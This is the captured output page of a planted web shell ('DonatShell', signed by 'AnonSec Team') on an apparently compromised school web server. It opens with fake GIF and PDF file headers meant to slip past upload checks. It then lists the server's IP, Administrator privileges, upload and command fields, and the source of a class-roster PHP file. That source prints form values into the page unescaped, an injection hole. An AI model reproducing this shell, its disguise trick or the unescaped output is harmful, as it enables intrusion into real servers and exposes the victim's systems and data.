GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/_Archive/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/_Archive/ClassRosterEdit.phpinc
<?
// ClassRosterEdit.phpinc

debugTrackBegin();
#if (dc()) echo "<b>".__FILE__."</b><br>\n";

if (!isset($f_classRoster)) $f_classRoster = formValue('classRoster');

$js = "ClassEvaluations,openCenteredWindow,wforms";
$headTitle = '_CST_ - '.$f_courseNumber;
$pageTitle = '_CST_<br>'.$f_courseNumber;
include('common/pageHeader.phpinc');
$sectionTitle = $f_courseNumber.' Class Roster';
include('common/sectionHeader.phpinc');

?>
<fieldset><legend>Class List</legend>
Cut and past the class roster from the MnSCU portal page.
<span class="error normal">Only copy the student information! <a href="/Admin/ClassRosterCopyExample.php" onclick="openCenteredWindow('/Admin/ClassRosterCopyExample.php',850,725); return false;">See example</a>.</span>
<?
?>
<form name="form_classroster" action="<?=str_replace('index.php','',$_SERVER['PHP_SELF']);?>" method="post" style="display:inline;">
<input name="f_uuid" type="hidden" value="<?=uuid()?>">
<input name="f_form" type="hidden" value="form_classroster">
<input name="f_classId" type="hidden" value="<?=$f_classId?>">
<input name="f_courseNumber" type="hidden" value="<?=$f_courseNumber?>">
<input name="f_courseId" type="hidden" value="<?=$f_courseId?>">
<input name="f_task" type="hidden" value="Class Roster">
<textarea name="f_classRoster" style="height:400px; width:950px;"><?=$f_classRoster?></textarea>
<br />
<input type="submit" name="f_subtask" value="Process Class Roster" class="small">
<input type="submit" name="f_subtask" value="Cancel" class="small">
</form>
<?
?>
</fieldset>

<?
include('common/sectionFooter.phpinc');
?>
<script type="text/javascript">
	document.form_classroster.f_classRoster.focus();
</script>
<?
debugTrackEnd();
?>

Anon7 - 2022
AnonSec Team